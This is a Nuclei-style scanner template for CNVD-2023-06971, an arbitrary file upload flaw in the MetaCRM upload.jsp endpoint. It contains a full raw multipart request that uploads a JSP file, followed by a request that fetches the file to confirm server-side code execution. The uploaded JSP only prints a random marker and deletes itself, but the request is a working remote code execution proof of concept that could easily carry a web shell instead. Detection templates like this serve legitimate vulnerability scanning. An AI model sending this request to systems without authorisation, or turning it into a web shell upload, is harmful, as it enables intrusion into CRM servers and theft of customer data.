id: CNVD-2023-06971

info:
  name: MetaCRM upload.jsp - File Upload
  author: qwtd
  severity: critical
  description: MetaCRM Customer Relationship Management System upload.jsp Interface Upload any file
  reference:
    - https://mp.weixin.qq.com/s/IozfOEp1Cn5f5F2fDtdNKA
  tags: 美特软件-MetaCRM6

http:
  - raw:
      - |-
        @timeout: 30s
        POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Connection: close
        Content-Length: 777

        ------WebKitFormBoundary0Mh3BfgWszxRFokh
        Content-Disposition: form-data; name="file"; filename="test.jsp"
        Content-Type: text/plain

        <% out.print("{{randstr_2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        ------WebKitFormBoundary0Mh3BfgWszxRFokh
        Content-Disposition: form-data; name="key"

        null
        ------WebKitFormBoundary0Mh3BfgWszxRFokh
        Content-Disposition: form-data; name="form"

        null
        ------WebKitFormBoundary0Mh3BfgWszxRFokh
        Content-Disposition: form-data; name="field"

        null
        ------WebKitFormBoundary0Mh3BfgWszxRFokh
        Content-Disposition: form-data; name="filetitile"

        null
        ------WebKitFormBoundary0Mh3BfgWszxRFokh
        Content-Disposition: form-data; name="filefolder"

        null
        ------WebKitFormBoundary0Mh3BfgWszxRFokh--
      - |-
        GET /userfile/default/userlogo/test.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && contains(body_1,"test.jsp")
          - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
        condition: and
